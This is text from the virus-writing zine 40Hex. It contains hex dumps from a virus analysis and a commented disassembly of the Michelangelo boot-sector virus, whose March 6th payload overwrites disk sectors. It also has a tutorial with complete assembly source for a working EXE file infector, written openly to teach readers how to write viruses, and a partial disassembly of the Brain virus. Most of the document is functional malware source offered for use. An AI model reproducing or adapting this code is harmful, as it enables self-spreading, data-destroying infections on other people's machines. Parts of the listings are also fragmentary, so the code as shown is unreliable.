18F3:0010  0B 18 56 05 0B 18 0B 18-01 01 01 00 02 FF FF FF   ..V.............
18F3:0020  FF FF FF FF FF FF FF FF-FF FF FF FF EE 18 E0 FF   ................
18F3:0030  00 90 14 00 18 00 F3 18-FF FF FF FF 00 00 00 00   ................
18F3:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18F3:0050  CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20   .!...........
18F3:0060  20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20           .....
18F3:0070  20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00           ........

------------------ Here follows the code of virus (CS=18FB) -----------------

18FB:0000  E9 01 10 4E 0A 00 10 00-00 00 00 00 00 42 3A 5C   ...N.........B:\
18FB:0010  54 4D 50 5C 44 52 4F 5A-46 49 4C 41 2E 43 4F 4D   TMP\DROZFILA.COM
18FB:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 FF   ................
18FB:0050  E9 93 06 3E 53 54 41 52-53 48 49 50 5F 31 3C 80   ...>STARSHIP_1<.
18FB:0060  FA 80 75 41 83 F9 01 75-3F 0A F6 75 38 80 FC 02   ..uA...u?..u8...
18FB:0070  75 29 1E 50 E8 13 03 58-9C FF 1E B8 04 1F 72 18   u).P...X......r.
18FB:0080  50 56 72 16 B8 01 00 BE-BE 01 26 89 40 02 B0 01   PVr.......&.@...
18FB:0090  26 88 40 01 5E 58 F8 FB-EB 7C 3C 80 FC 03 74 F6   &.@.^X...|<...t.
18FB:00A0  80 FC 05 74 F1 E9 3E 01-80 FE 08 75 F8 51 02 C8   ...t..>....u.Q..
18FB:00B0  80 F9 CC 59 72 EF 80 FD-FE 72 EA 80 FC 02 74 D6   ...Yr....r....t.
18FB:00C0  75 D9 FF F1 E8 9C 2E 80-3E 4F 00 00 75 18 50 1E   u.......>O..u.P.
18FB:00D0  8C C8 2D 09 00 E8 A9 02-A1 3C 00 48 E8 A2 02 2E   ..-......<.H....
18FB:00E0  F6 16 4F 00 1F 58 80 FC-3C 75 31 2E 83 3E 0B 00   ..O..X..<u1..>..
18FB:00F0  00 75 6E E8 6E 00 75 69-9D E8 CC 00 72 18 50 51   .un.n.ui....r.PQ


Figure 2. Dump of pseudoDOS boot sector
(thin line denotes random garbage).

   0000  EB 34 90 4D 53 BF 05 00-CD 13 73 09 32 E4 CD 13   .4.MS.....s.2...
   0010  4F 75 F5 CD 18 C3 B9 01-00 E8 E9 FF 80 3E 00 7E   Ou...........>.~
   0020  EB 75 10 A0 02 7E BB 00-7E E8 97 00 0A E4 74 03   .u...~..~.....t.
   0030  80 EF 02 06 53 CB FA 33-C0 8E D0 BC 00 7C 8B F4   ....S..3.....|..
   0040  8E C0 8E D8 FB FC BF 00-06 B9 00 01 F3 A5 EA 53   ...............S
   0050  06 00 00 B9 37 00 BE D6-06 BF C0 02 F3 A4 BF B0   ....7...........
   0060  04 B9 08 00 F3 A4 1E C5-06 4C 00 AB 8C D8 AB 1F   .........L......
   0070  FE 06 FC 7D A1 FC 7D B9-CC FE BB 00 7C BA 80 08   ...}..}.....|...
   0080  0A C0 74 08 50 B8 01 03-E8 7A FF 58 41 89 0E DB   ..t.P....z.XA...
   0090  02 88 36 DF 02 06 BB 00-BB 8E C3 88 26 E7 02 CD   ..6.........&...
   00A0  B0 26 A2 63 01 26 8C 1E-C2 00 07 FA C7 06 4C 00   .&.c.&........L.
   00B0  B0 04 8C 1E 4E 00 FB BB-00 7C B8 06 02 BA 80 00   ....N....|......
   00C0  E9 53 FF 53 51 B9 0A 0A-32 E4 26 30 07 26 02 27   .S.SQ...2.&0.&.'
   00D0  43 E2 F7 59 5B C3 C4 02-00 00 50 06 53 B8 00 BB   C..Y[.....P.S...
   00E0  8E C0 BB 50 00 26 80 3F-E9 74 1E 52 51 B8 05 02   ...P.&.?.t.RQ...
   00F0  B9 00 00 BA 80 00 9C 2E-FF 1E B8 04 B0 00 B9 0A   ................
   0100  0A 26 30 07 43 E2 FA 59-5A 5B 07 58 CF CD B0 9A   .&0.C..YZ[.X....
   0110  5F 00 00 BB EA|1E 0E 1F-8E C0 33 FF 50 FC 32 C0|  _.........3.P.2.
  +--------------------+                                |
  |0120  B9 50 00 F3 AA E8 F6 F7-8B F7 B9 0A 0A F3 A4 E8|  .P..............
  |0130  98 F9 58 FA A3 B5 04 A3-C1 04 B8 90 90 A3 B0 04|  ..X.............
  |0140  A3 BC 04 C7 06 BF 04 C5-00 B8 EB 05 A3 C8 04 B8|  ................
  |0150  EB F4 A3 D4 04 BF CA 04-BE DB 04 06 1E 07 A5 A5|  ................
  |0160  A4 FB A3 D9 04 A3 C8 02-C7 06 E0 02 CD 13 C7 06|  ................
  |0170  E2 02 EB 0D FE 06 D9 02-CD B0 B9 37 00 BF C0 02|  ...........7....
  |0180  1E 07 8C D8 F3 AA 07 1F-C3 B4 62 E8 7A F7 C3 90|  ..........b.z...
  |0190  90 90 90 90 90 90 90 90-90 90 A4 4B 4C EA A6 8C|  ...........KL...
  |01A0  BE 23 54 F4 BC E8 B8 6B-5B F1 B2 EC B2 81 5E F6|  .#T....k[.....^.
  |01B0  88 D0 8C BC 64 CC 8E CC-86 69 6A C2 84 C8 80 6F|  ....d....ij....o
  |01C0  FA 2B C0 8E D0 8E C0 8E-D8 B8 00 7C 8B E0 FB 8B|  .+.........|....
  |01D0  F0 BF 00 7E FC B9 00 01-F3 A5 E9 00 02 B9 10 00|  ...~............
  |01E0  8B 36 85 7E F6 04 80 75-08 83 EE 10 E2 F6 EB 37|  .6.~...u.......7
  |                                   +-----------------+
  |01F0  90 BF BE 07 57 B9 08 00-F3 A5|74 91 05 AD 55 AA   ....W.....t...U.

Figure 3. Dispatcher code located at absolute address 0:4B0.

        a) virus code located in videomemory

0000:04B0  CD B0              INT  B0        <== int 13h
0000:04B2  9A 5F 00 00 BB     CALL BB00:005F
0000:04B7  EA 3D A3 00 F0     JMP  F000:A33D

0000:04BC  CD B0              INT  B0        <== int 21h
0000:04BE  9A D6 03 00 BB     CALL BB00:03D6
0000:04C3  EA 60 14 73 02     JMP  0273:1460

0000:04C8  CD B0              INT  B0        <== int 20h
0000:04CA  9A DD 03 00 BB     CALL BB00:03DD
0000:04CF  EA 3F 14 73 02     JMP  0273:143F

0000:04D4  CD B0              INT  B0        <== int 27h
0000:04D6  9A 93 03 00 BB     CALL BB00:0393
0000:04DB  EA 66 63 73 02     JMP  0273:6366

        b) after removing of code from videomemory
           (segment CS=18FB is where virus resides)

0000:04B0  90                 NOP            <== int 13h
0000:04B1  90                 NOP
0000:04B2  9A 5F 00 6D 19     CALL 18FB:005F
0000:04B7  EA 3D A3 00 F0     JMP  F000:A33D

0000:04BC  90                 NOP            <== int 21h
0000:04BD  90                 NOP
0000:04BE  9A C5 00 6D 19     CALL 18FB:00C5
0000:04C3  EA 3D A3 00 F0     JMP  0273:1460

0000:04C8  EB 05              JMP  4CF       <== int 20h
0000:04CA  EA 3F 14 73 02     JMP  0273:143F
0000:04CF  EA 66 63 73 02     JMP  0273:6366
0000:04D4  EB F4              JMP  4CA       <== int 27h

All  corrections and  remarks will be greatly appreciated. Send
information directly via E-mail address (MIG@politon.msk.su) or
in  comp.virus group of USENET (I am monitoring it permanently).

F   .rs mbyt-  tF   .rs mbyt-  tF   .  (What is this? -Ed.)
40Hex Number 8 Volume 2 Issue 4                                       File 006

; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus.  The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus.  In any case, it is yet another boot sector
; and partition table infector.

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
; Disassembly by Dark Angel of PHALCON/SKISM
                org     0

                jmp     entervirus
highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

                push    ds
                push    ax
                or      dl, dl                  ; default drive?
                jnz     exitint13h              ; exit if not
                xor     ax, ax
                mov     ds, ax
                test    byte ptr ds:[43fh], 1   ; disk 0 on?
                jnz     exitint13h              ; if not spinning, exit
                pop     ax
                pop     ds
                call    dword ptr cs:[oldint13h]; first call old int 13h
                call    infectdisk              ; then infect
                retf    2
exitint13h:     pop     ax
                pop     ds
                jmp     dword ptr cs:[oldint13h]

                push    ax
                push    bx
                push    cx
                push    dx
                push    ds
                push    es
                push    si
                push    di
                push    cs
                pop     ds
                push    cs
                pop     es
                mov     si, 4
                mov     ax,201h                 ; Read boot block to
                mov     bx,200h                 ; after virus
		mov	cx,1
                xor     dx,dx
                call    oldint13h
                jnc     checkinfect             ; continue if no error
                xor     ax,ax
                call    oldint13h               ; Reset disk
                dec     si                      ; loop back
                jnz     readbootblock
                jmp     short quitinfect        ; exit if too many failures
                xor     si,si
                cmp     ax,[bx]                 ; check if already infected
                jne     infectitnow
                cmp     ax,[bx+2]               ; check again
                je      quitinfect
                mov     ax,301h                 ; Write old boot block
                mov     dh,1                    ; to head 1
                mov     cl,3                    ; sector 3
                cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
                je      is360Kdisk
                mov     cl,0Eh
                mov     firstsector,cx
                call    oldint13h
                jc      quitinfect              ; exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ; Copy partition table
                rep     movsw
                mov     ax,301h                 ; Write virus to sector 1
                xor     bx,bx
		mov	cx,1
                xor     dx,dx
                call    oldint13h
		pop	di
		pop	si
		pop	es
		pop	ds
		pop	dx
		pop	cx
		pop	bx
		pop	ax
                xor     ax,ax
		mov	ds,ax
		mov	ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
		dec	ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
                xor     ax,ax
		mov	es,ax
                int     13h                     ; reset disk
                push    cs
		pop	ds
		mov	ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
                jne     floppyboot              ; if not, do floppies
                mov     dx,80h                  ; Read old partition table of
                int     13h                     ; first hard disk to 0:7C00h
                jmp     short exitvirus
                mov     cx,firstsector          ; read old boot block
                mov     dx,100h                 ; to 0:7C00h
                int     13h
                jc      exitvirus
		push	cs
		pop	es
                mov     ax,201h                 ; read boot block
                mov     bx,200h                 ; of first hard disk
		mov	cx,1
		mov	dx,80h
                int     13h
                jc      exitvirus
                xor     si,si
                cmp     ax,[bx]                 ; is it infected?
                jne     infectharddisk          ; if not, infect HD
                lodsw                           ; check infection
		cmp	ax,[bx+2]
                jne     infectharddisk
                xor     cx,cx                   ; Real time clock get date
                mov     ah,4                    ; dx = mon/day
                int     1Ah
                cmp     dx,306h                 ; March 6th
                je      damagestuff
                retf                            ; return control to original
                                                ; boot block @ 0:7C00h
                xor     dx,dx
		mov	cx,1
		mov	ax,309h
                mov     si,firstsector
		cmp	si,3
                je      smashit
		mov	al,0Eh
		cmp	si,0Eh
                je      smashit
                mov     dl,80h                  ; first hard disk
                mov     maxhead,4
		mov	al,11h
                mov     bx,5000h                ; random memory area
                mov     es,bx                   ; at 5000h:5000h
                int     13h                     ; Write al sectors to drive dl
                jnc     skiponerror             ; skip on error
                xor     ah,ah                   ; Reset disk drive dl
                int     13h
                inc     dh                      ; next head
                cmp     dh,maxhead              ; 2 if floppy, 4 if HD
                jb      smashanothersector
                xor     dh,dh                   ; go to next head/cylinder
		inc	ch
                jmp     short smashanothersector
                mov     cx,7                    ; Write partition table to
                mov     firstsector,cx          ; sector 7
		mov	ax,301h
		mov	dx,80h
                int     13h
                jc      exitvirus
                mov     si,200h+offset partitioninfo ; Copy partition
                mov     di,offset partitioninfo      ; table information
		mov	cx,21h
                rep     movsw
                mov     ax,301h                 ; Write to sector 8
                xor     bx,bx                   ; Copy virus to sector 1
		inc	cl
                int     13h
;*              jmp     short 01E0h
                db      0EBh, 32h               ; ?This should crash?
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends

40Hex Number 8 Volume 2 Issue 4                                       File 007

                    An Introduction to Nonoverwriting Virii
                            Part II: EXE Infectors
                                 By Dark Angel
       In the  last issue  of 40Hex,  I presented  theory and  code  for  the
  nonoverwriting  COM   infector,  the   simplest  of  all  parasitic  virii.
  Hopefully, having  learned COM  infections cold,  you are now ready for EXE
  infections.  There is a grey veil covering the technique of EXE infections,
  as the majority of virii are COM-only.
       EXE infections  are, in  some  respects,  simpler  than  COM  viruses.
  However, to  understand the infection, you must understand the structure of
  EXE files  (naturally).   EXE files  are structured into segments which are
  loaded consecutively  atop one  another.  Thus, all an EXE infector must do
  is create  its own  segment in  the EXE  file and  alter  the  entry  point
  appropriately.   Therefore, EXE  infections do  not require  restoration of
  bytes of  code, but  rather involve  the manipulation  of the  header which
  appears in  the beginning every EXE file and the appending of viral code to
  the infected file.  The format of the header follows:
   Offset Description
     00   ID word, either 'MZ' or 'ZM'
     02   Number of bytes in the last (512 byte) page in the image
     04   Total number of 512 byte pages in the file
     06   Number of entries in the segment table
     08   Size of the header in (16 byte) paragraphs
     0A   Minimum memory required in paragraphs
     0C   Maximum memory requested in paragraphs
     0E   Initial offset in paragraphs to stack segment from header
     10   Initial offset in bytes of stack pointer from stack segment
     12   Negative checksum (ignored)
     14   Initial offset in bytes of instruction pointer from code segment
     16   Initial offset in paragraphs of code segment from header
     18   Offset of relocation table from start of file
     1A   Overlay number (ignored)
  The ID  word is  generally 'ZM'  (in the  Intel little-endian format).  Few
  files start  with the  alternate form,  'MZ' (once  again in  Intel little-
  endian format).   To  save space, a check for the alternate form of the EXE
  ID in  the virus  may be omitted, although a few files may be corrupted due
  to this omission.
  The words  at offsets  2 and  4 are related.  The word at offset 4 contains
  the filesize  in pages.   A  page is  a 512 byte chunk of memory, just as a
  word is  a two  byte chunk of memory.  This number is rounded up, so a file
  of length  514 bytes  would contain a 2 at offset 4 in the EXE header.  The
  word at offset 2 is the image length modulo 512.  The image length does not
  include the  header length.   This  is one of the bizarre quirks of the EXE
  header.   Since the header length is usually a multiple of 512 anyway, this
  quirk usually  does not  matter.  If the word at offset 2 is equal to four,
  then it  is generally  ignored (heck,  it's never really used anyway) since
  pre-1.10 versions  of the  Microsoft linker had a bug which caused the word
  to always  be equal  to four.  If you are bold, the virus can set this word
  to 4.   However, keep in mind that this was a bug of the linker and not all
  command interpreters may recognise this quirk.
  The minimum memory required by the program (offset A) can be ignored by the
  virus, as  the maximum  memory is generally allocated to the program by the
  operating system.   However,  once again,  ignoring this area of the header
  MAY cause  an unsucessful  infection.   Simply adding  the  virus  size  in
  paragraphs to this value can nullify the problem.
  The words  representing the  initial stack segment and pointer are reversed
  (not in  little-endian format).   In  other words,  an LES to this location
  will yield  the stack  pointer in  ES and  the  stack  segment  in  another
  register.   The initial  SS:SP is  calculated  with  the  base  address  of
  0000:0000 being at the end of the header.
  Similarly, the  initial CS:IP  (in little-endian format) is calculated with
  the base  address of  0000:0000 at  the end of the header.  For example, if
  the program  entry point  appears directly after the header, then the CS:IP
  would be 0000:0000.  When the program is loaded, the PSP+10 is added to the
  segment value (the extra 10 accounts for the 100h bytes of the PSP).
  All the  relevant portions  of the  EXE header  have been covered.  So what
  should be  done to  write a  nonoverwriting EXE infector?  First, the virus
  must be appended to the end of the file.  Second, the initial CS:IP must be
  saved and  subsequently changed  in the  header.   Third, the initial SS:SP
  should also  be saved  and changed.   This  is to avoid any possible memory
  conflicts from  the stack  overwriting viral  code.   Fourth, the file size
  area of  the header should be modified to correctly reflect the new size of
  the file.   Fifth,  any additional  safety modifications such as increasing
  the minimum  memory allocation  should be made.  Last, the header should be
  written to the infected file.
  There are  several good areas for ID bytes in the EXE header.  The first is
  in the stack pointer field.  Since it should be changed anyway, changing it
  to a  predictable number  would add nothing to the code length.  Make sure,
  however, to  make the stack pointer high enough to prevent code overwrites.
  Another common  area for ID bytes is in the negative checksum field.  Since
  it is  an unused  field, altering  it won't  affect the  execution  of  any
  One further item should be mentioned before the code for the EXE infector.
  It is important to remember that EXE files are loaded differently than COM
  files.  Although a PSP is still built, the initial CS does NOT point to it.
  Instead, it points to wherever the entry point happens to be.  DS and ES
  point to the PSP, and therefore do NOT point to the entry point (your virus
  code).  It is important to restore DS and ES to their proper values before
  returning control to the EXE.
  ----cut here---------------------------------------------------------------
  .model tiny                             ; Handy TASM directive
  .code                                   ; Virus code segment
            org 100h                      ; COM file starting IP
  ; Cheesy EXE infector
  ; Written by Dark Angel of PHALCON/SKISM
  ; For 40Hex Number 8 Volume 2 Issue 4
  id = 'DA'                               ; ID word for EXE infections
  startvirus:                             ; virus code starts here
            call next                     ; calculate delta offset
  next:     pop  bp                       ; bp = IP next
            sub  bp,offset next           ; bp = delta offset
            push ds
            push es
            push cs                       ; DS = CS
            pop  ds
            push cs                       ; ES = CS
            pop  es
            lea  si,[bp+jmpsave2]
            lea  di,[bp+jmpsave]
            mov  ah,1Ah                   ; Set new DTA
            lea  dx,[bp+newDTA]           ; new DTA @ DS:DX
            int  21h
            lea  dx,[bp+exe_mask]
            mov  ah,4eh                   ; find first file
            mov  cx,7                     ; any attribute
            int  21h                      ; DS:DX points to mask
            jc   done_infections          ; No mo files found
            mov  al,0h                    ; Open read only
            call open
            mov  ah,3fh                   ; Read file to buffer
            lea  dx,[bp+buffer]           ; @ DS:DX
            mov  cx,1Ah                   ; 1Ah bytes
            int  21h
            mov  ah,3eh                   ; Close file
            int  21h
  checkEXE: cmp  word ptr [bp+buffer+10h],id ; is it already infected?
            jnz  infect_exe
            mov  ah,4fh                   ; find next file
            jmp  short findfirstnext
            mov  ah,1ah                   ; restore DTA to default
            mov  dx,80h                   ; DTA in PSP
            pop  es
            pop  ds                       ; DS->PSP
            int  21h
            mov  ax,es                    ; AX = PSP segment
            add  ax,10h                   ; Adjust for PSP
            add  word ptr cs:[si+jmpsave+2],ax
            add  ax,word ptr cs:[si+stacksave+2]
            cli                           ; Clear intrpts for stack manip.
            mov  sp,word ptr cs:[si+stacksave]
            mov  ss,ax
            db   0eah                     ; jmp ssss:oooo
  jmpsave             dd ?                ; Original CS:IP
  stacksave           dd ?                ; Original SS:SP
  jmpsave2            dd 0fff00000h       ; Needed for carrier file
  stacksave2          dd ?
  creator             db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
  virusname           db '[DemoEXE] for 40Hex',0
            les  ax, dword ptr [bp+buffer+14h] ; Save old entry point
            mov  word ptr [bp+jmpsave2], ax
            mov  word ptr [bp+jmpsave2+2], es
            les  ax, dword ptr [bp+buffer+0Eh] ; Save old stack
            mov  word ptr [bp+stacksave2], es
            mov  word ptr [bp+stacksave2+2], ax
            mov  ax, word ptr [bp+buffer + 8] ; Get header size
            mov  cl, 4                        ; convert to bytes
            shl  ax, cl
            xchg ax, bx
            les  ax, [bp+offset newDTA+26]; Get file size
            mov  dx, es                   ; to DX:AX
            push ax
            push dx
            sub  ax, bx                   ; Subtract header size from
            sbb  dx, 0                    ; file size
            mov  cx, 10h                  ; Convert to segment:offset
            div  cx                       ; form
            mov  word ptr [bp+buffer+14h], dx ; New entry point
            mov  word ptr [bp+buffer+16h], ax
            mov  word ptr [bp+buffer+0Eh], ax ; and stack
            mov  word ptr [bp+buffer+10h], id
            pop  dx                       ; get file length
            pop  ax
            add  ax, heap-startvirus      ; add virus size
            adc  dx, 0
            mov  cl, 9                    ; 2**9 = 512
            push ax
            shr  ax, cl
            ror  dx, cl
            adc  dx, ax                   ; filesize in pages
            pop  ax
            and  ah, 1                    ; mod 512
            mov  word ptr [bp+buffer+4], dx ; new file size
            mov  word ptr [bp+buffer+2], ax
            push cs                       ; restore ES
            pop  es
            mov  cx, 1ah
            push cx                       ; Save # bytes to write
            xor  cx,cx                    ; Clear attributes
            call attributes               ; Set file attributes
            mov  al,2
            call open
            mov  ah,40h                   ; Write to file
            lea  dx,[bp+buffer]           ; Write from buffer
            pop  cx                       ; cx bytes
            int  21h
            mov  ax,4202h                 ; Move file pointer
            xor  cx,cx                    ; to end of file
            cwd                           ; xor dx,dx
            int  21h
            mov  ah,40h                   ; Concatenate virus
            lea  dx,[bp+startvirus]
            mov  cx,heap-startvirus       ; # bytes to write
            int  21h
            mov  ax,5701h                 ; Restore creation date/time
            mov  cx,word ptr [bp+newDTA+16h] ; time
            mov  dx,word ptr [bp+newDTA+18h] ; date
            int  21h
            mov  ah,3eh                   ; Close file
            int  21h
            mov ch,0
            mov cl,byte ptr [bp+newDTA+15h] ; Restore original
            call attributes                 ; attributes
  mo_infections: jmp find_next
            mov  ah,3dh
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h
            xchg ax,bx
            mov  ax,4301h                 ; Set attributes to cx
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h
  exe_mask            db '*.exe',0
  heap:                                   ; Variables not in code
  newDTA              db 42 dup (?)       ; Temporary DTA
  buffer              db 1ah dup (?)      ; read buffer
  endheap:                                ; End of virus
  end       startvirus
  ----cut here---------------------------------------------------------------
  This is a simple EXE infector.  It has limitations; for example, it does
  not handle misnamed COM files.  This can be remedied by a simple check:
    cmp [bp+buffer],'ZM'
    jnz misnamed_COM
  Take special notice of the done_infections and infect_exe procedures.  They
  handle all  the relevant portions of the EXE infection.  The restoration of
  the EXE  file simply  consists of  resetting the stack and a far jmp to the
  original entry point.
  A final  note on  EXE infections: it is often helpful to "pad" EXE files to
  the nearest  segment.  This accomplishes two things.  First, the initial IP
  is  always  0,  a  fact  which  can  be  used  to  eliminate  delta  offset
  calculations.   Code space  can be  saved by  replacing all  those annoying
  relative memory  addressing statements  ([bp+offset blip])  statements with
  their absolute  counterparts (blip).   Second, recalculation of header info
  can be  handled in  paragraphs, simplifying  it tremendously.  The code for
  this is left as an exercise for the reader.
  This file is dedicated to the [XxXX] (Censored. -Ed.) programmers (who have
  yet to figure out how to  write EXE  infectors).  Hopefully, this  text can
  teach them (and everyone else) how to progress beyond simple COM and spawn-
  ing EXE infectors.   In the next issue of 40Hex,  I will present the theory
  and code for the next step of file infector - the coveted SYS file.
40Hex Number 8 Volume 2 Issue 4                                       File 008

; This is the ashar variant of the classic Pakistani Brain virus. It is large
; by today's standards, although it was one of the first.  It is a floppy only
; boot sector infector.

brain           segment byte public
                assume  cs:brain, ds:brain
; Disassembly done by Dark Angel of PHALCON/SKISM
		org	0

                jmp     entervirus
idbytes         db       34h, 12h
firsthead       db      0
firstsector     dw      2707h
curhead         db      0
cursector       dw      1
                db      0, 0, 0, 0
                db      'Welcome to the  Dungeon         '
copyright	db	'(c) 1986 Brain'
                db      17h
		db	'& Amjads (pvt) Ltd   VIRUS_SHOE '
		db	' RECORD   v9.0   Dedicated to th'
		db	'e dynamic memories of millions o'
		db	'f virus who are no longer with u'
		db	's today - Thanks GOODNESS!!     '
                db      '  BEWARE OF THE er..VIRUS  : \th'
		db	'is program is catching      prog'
		db	'ram follows after these messeges'
		db	'..... 

		db	'#@%

		db	'@!! '
		mov	ax,cs
                mov     ds,ax                   ; ds = 0
                mov     ss,ax                   ; set stack to after
                mov     sp,0F000h               ; virus
                mov     al,ds:[7C00h+offset firsthead]
                mov     ds:[7C00h+offset curhead],al
                mov     cx,ds:[7C00h+offset firstsector]
                mov     ds:[7C00h+offset cursector],cx
                call    calcnext
                mov     cx,5                    ; read five sectors
                mov     bx,7C00h+200h           ; after end of virus

                call    readdisk
                call    calcnext
		add	bx,200h
                loop    loadnext

                mov     ax,word ptr ds:[413h]   ; Base memory size in Kb
                sub     ax,7                    ; - 7 Kb
                mov     word ptr ds:[413h],ax   ; Insert as new value
		mov	cl,6
                shl     ax,cl                   ; Convert to paragraphs
		mov	es,ax
                mov     si,7C00h                ; Copy from virus start
                mov     di,0                    ; to start of memory
                mov     cx,1004h                ; Copy 1004h bytes
                rep     movsb
		push	es
		mov	ax,200h
		push	ax
                retf                            ; return to old boot sector

		push	cx
		push	bx
                mov     cx,4                    ; Try 4 times

		push	cx
                mov     dh,ds:[7C00h+offset curhead]
                mov     dl,0                    ; Read sector from default
                mov     cx,ds:[7C00h+offset cursector]
                mov     ax,201h                 ; Disk to memory at es:bx
                int     13h
                jnc     readOK
                mov     ah,0                    ; Reset disk
                int     13h                     ; (force read track 0)
		pop	cx
                loop    tryread

                int     18h                     ; ROM basic on failure
		pop	cx
		pop	bx
		pop	cx

                mov     al,byte ptr ds:[7C00h+offset cursector]
		inc	al
                mov     byte ptr ds:[7C00h+offset cursector],al
		cmp	al,0Ah
                jne     donecalc
                mov     byte ptr ds:[7C00h+offset cursector],1
                mov     al,ds:[7C00h+offset curhead]
		inc	al
                mov     ds:[7C00h+offset curhead],al
		cmp	al,2
                jne     donecalc
                mov     byte ptr ds:[7C00h+offset curhead],0
                inc     byte ptr ds:[7C00h+offset cursector+1]

; the following is a collection of garbage bytes
                db       00h, 00h, 00h, 00h, 32h,0E3h
                db       23h, 4Dh, 59h,0F4h,0A1h, 82h
                db      0BCh,0C3h, 12h, 00h, 7Eh, 12h
                db      0CDh, 21h,0A2h, 3Ch, 5Fh
a_data          dw      050Ch
; Second part of the virus begins here
                jmp     short entersecondpart
                db      '(c) 1986 Brain & Amjads (pvt) Ltd ',0
readcounter     db      4                       ; keep track of # reads
curdrive        db      0
int13flag       db      0

                mov     cs:readcounter,1Fh
                xor     ax,ax
                mov     ds,ax                   ; ds -> interrupt table
                mov     ax,ds:[13h*4]
                mov     ds:[6Dh*4],ax
                mov     ax,ds:[13h*4+2]
                mov     ds:[6Dh*4+2],ax
                mov     ax,offset int13         ; 276h
                mov     ds:[13h*4],ax
		mov	ax,cs
                mov     ds:[13h*4+2],ax
                mov     cx,4                    ; 4 tries
                xor     ax,ax
                mov     es,ax                   ; es -> interrupt table

		push	cx
                mov     dh,cs:firsthead
		mov	dl,0
                mov     cx,cs:firstsector
                mov     ax,201h                 ; read from default disk
		mov	bx,7C00h
                int     6Dh                     ; int 13h
                jnc     readbootOK
		mov	ah,0
                int     6Dh                     ; int 13h
		pop	cx
                loop    tryreadbootsector

                int     18h                     ; ROM basic on failure
readbootOK:                                     ; return control to
                                                ; original boot sector
;*              jmp     far ptr 0000:7C00h
		db	0EAh, 00h, 7Ch, 00h, 00h
                nop                             ; MASM NOP!!!
                cmp     ah,2                    ; if not read request,
                jne     doint13                 ; do not go further
                cmp     dl,2                    ; if after second floppy,
                ja      doint13                 ; do not go further
                cmp     ch,0                    ; if not reading boot sector,
                jne     regularread             ; go handle as usual
                cmp     dh,0                    ; if boot sector,
                je      readboot                ; do I<-/>/\|> stuff
                dec     cs:readcounter          ; Infect after 4 reads
                jnz     doint13                 ; If counter still OK, don't
                                                ; do anything else
                jmp     short readboot          ; Otherwise, try to infect
                jmp     exitint13h
                mov     cs:int13flag,0          ; clear flag
                mov     cs:readcounter,4        ; reset counter
		push	ax
		push	bx
		push	cx
		push	dx
                mov     cs:curdrive,dl
		mov	cx,4

		push	cx
                mov     ah,0                    ; Reset disk
                int     6Dh
                jc      errorreadingbootblock   ; Try again
                mov     dh,0
		mov	cx,1
                mov     bx,offset readbuffer    ; buffer @ 6BEh
		push	es
		mov	ax,cs
		mov	es,ax
		mov	ax,201h
                int     6Dh                     ; Read boot sector
		pop	es
                jnc     continuestuff           ; continue if no error
                pop     cx
                loop    tryreadbootblock

                jmp     short resetdisk         ; too many failures
                pop     cx                      ; get system id in boot block
                mov     ax,word ptr cs:[offset readbuffer+4]
                cmp     ax,1234h                ; already infected?
                jne     dodisk                  ; if not, infect it
                mov     cs:int13flag,1          ; flag prev. infection
                jmp     short noreset
		push	ds
		push	es
		mov	ax,cs
		mov	ds,ax
		mov	es,ax
		push	si
                call    writevirus              ; infect the disk
                jc      failme                  ; exit on failure
                mov     cs:int13flag,2          ; flag success
                call    changeroot              ; manipulate volume label
		pop	si
		pop	es
		pop	ds
                jnc     noreset                 ; don't reset on success
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
		pop	dx
		pop	cx
		pop	bx
		pop	ax
		cmp	cx,1
                jne     exitint13h
		cmp	dh,0
                jne     exitint13h
                cmp     cs:int13flag,1          ; already infected?
                jne     wasntinfected           ; if wasn't, go elsewhere
                mov     cx,word ptr cs:[offset readbuffer+7]
                mov     dx,word ptr cs:[offset readbuffer+5]
                mov     dl,cs:curdrive          ; otherwise, read real
                jmp     short exitint13h        ; boot sector
                cmp     cs:int13flag,2          ; successful infection?
                jne     exitint13h              ; if not, just do call
                mov     cx,cs:firstsector
                mov     dh,cs:firsthead
                int     6Dh                     ; int 13h
                retf    2
		db	15 dup (0)

FATManip:                                       ; returns al as error code
                jmp     short delvedeeper
FATManipreadcounter dw      3
                db      ' (c) 1986 Brain & Amjads (pvt) Ltd'
